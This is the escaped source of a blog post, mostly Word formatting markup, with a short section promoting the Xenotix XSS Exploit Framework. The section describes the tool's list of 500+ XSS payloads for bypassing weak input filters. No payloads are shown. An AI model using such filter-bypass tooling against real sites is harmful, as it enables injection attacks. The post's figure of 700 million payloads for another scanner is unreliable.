  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="19" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="21" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="31" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/&gt;
  &lt;w:LsdException Locked="false" Priority="32" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/&gt;
  &lt;w:LsdException Locked="false" Priority="33" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="37" Name="Bibliography"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/&gt;
 &lt;/w:LatentStyles&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:"Table Normal";
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-priority:99;
 mso-style-qformat:yes;
 mso-style-parent:"";
 mso-padding-alt:0in 5.4pt 0in 5.4pt;
 mso-para-margin-top:0in;
 mso-para-margin-right:0in;
 mso-para-margin-bottom:8.0pt;
 mso-para-margin-left:0in;
 line-height:107%;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:"Calibri","sans-serif";
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-bidi-font-family:"Times New Roman";
 mso-bidi-theme-font:minor-bidi;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;[VIDEO] &lt;/span&gt;&lt;/b&gt;&lt;a href="https://www.youtube.com/watch?v=CJEgO4_kd-8"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;https://www.youtube.com/watch?v=CJEgO4_kd-8&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt; [/VIDEO]&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h4&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Built in Payload List&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;It
is having an inbuilt XSS payload list of above 500+ XSS payloads. It includes
HTML5 compactable XSS injection payloads.Most of the XSS filters are
implemented using &lt;i style="mso-bidi-font-style: normal;"&gt;String Replace filter&lt;/i&gt;,
&lt;i style="mso-bidi-font-style: normal;"&gt;htmlentities filter&lt;/i&gt; and &lt;i style="mso-bidi-font-style: normal;"&gt;htmlspecialcharacters filter&lt;/i&gt;. Most of
these weakly designed filters can be bypassed by specific XSS payloads present
in the inbuilt payload list.&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi46.tinypic.com/2iuxmh4.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://oi46.tinypic.com/2iuxmh4.jpg" height="240" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;The
above chart shows the number of XSS Payloads in different XSS Scanning tools
available in market. Xenotix XSS Exploit Framework got the world’s second largest
XSS Payload list after IBM AppScan Security which is having 700 million
payloads.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;h4&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;XSS Scanner Module&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;/div&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;o:OfficeDocumentSettings&gt;
  &lt;o:RelyOnVML/&gt;
  &lt;o:AllowPNG/&gt;
 &lt;/o:OfficeDocumentSettings&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:WordDocument&gt;
  &lt;w:View&gt;Normal&lt;/w:View&gt;
  &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;
  &lt;w:TrackMoves/&gt;
  &lt;w:TrackFormatting/&gt;
  &lt;w:PunctuationKerning/&gt;
  &lt;w:ValidateAgainstSchemas/&gt;
  &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;
  &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;
  &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;
  &lt;w:DoNotPromoteQF/&gt;
  &lt;w:LidThemeOther&gt;EN-US&lt;/w:LidThemeOther&gt;
  &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;
  &lt;w:LidThemeComplexScript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;
  &lt;w:Compatibility&gt;
   &lt;w:BreakWrappedTables/&gt;
   &lt;w:SnapToGridInCell/&gt;
   &lt;w:WrapTextWithPunct/&gt;
   &lt;w:UseAsianBreakRules/&gt;
   &lt;w:DontGrowAutofit/&gt;
   &lt;w:SplitPgBreakAndParaMark/&gt;
   &lt;w:DontVertAlignCellWithSp/&gt;
   &lt;w:DontBreakConstrainedForcedTables/&gt;
   &lt;w:DontVertAlignInTxbx/&gt;
   &lt;w:Word11KerningPairs/&gt;
   &lt;w:CachedColBalance/&gt;
  &lt;/w:Compatibility&gt;
  &lt;m:mathPr&gt;
   &lt;m:mathFont m:val="Cambria Math"/&gt;
   &lt;m:brkBin m:val="before"/&gt;
   &lt;m:brkBinSub m:val="--"/&gt;
   &lt;m:smallFrac m:val="off"/&gt;
   &lt;m:dispDef/&gt;
   &lt;m:lMargin m:val="0"/&gt;
   &lt;m:rMargin m:val="0"/&gt;
   &lt;m:defJc m:val="centerGroup"/&gt;
   &lt;m:wrapIndent m:val="1440"/&gt;
   &lt;m:intLim m:val="subSup"/&gt;
   &lt;m:naryLim m:val="undOvr"/&gt;
  &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 &lt;w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
  LatentStyleCount="267"&gt;
  &lt;w:LsdException Locked="false" Priority="0" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Normal"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 7"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 8"/&gt;
  &lt;w:LsdException Locked="false" Priority="39" Name="toc 9"/&gt;
  &lt;w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/&gt;
  &lt;w:LsdException Locked="false" Priority="10" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Title"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/&gt;
  &lt;w:LsdException Locked="false" Priority="11" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/&gt;
  &lt;w:LsdException Locked="false" Priority="22" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Strong"/&gt;
  &lt;w:LsdException Locked="false" Priority="20" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="59" SemiHidden="false"
   UnhideWhenUsed="false" Name="Table Grid"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/&gt;
  &lt;w:LsdException Locked="false" Priority="1" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/&gt;
  &lt;w:LsdException Locked="false" Priority="34" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/&gt;
  &lt;w:LsdException Locked="false" Priority="29" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="30" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/&gt;
  &lt;w:LsdException Locked="false" Priority="60" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="61" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="62" SemiHidden="false"
   UnhideWhenUsed="false" Name="Light Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="63" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="64" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="65" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="66" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="67" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="68" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="69" SemiHidden="false"
   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="70" SemiHidden="false"
   UnhideWhenUsed="false" Name="Dark List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="71" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="72" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful List Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="73" SemiHidden="false"
   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/&gt;
  &lt;w:LsdException Locked="false" Priority="19" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="21" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/&gt;
  &lt;w:LsdException Locked="false" Priority="31" SemiHidden="false"
   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/&gt;
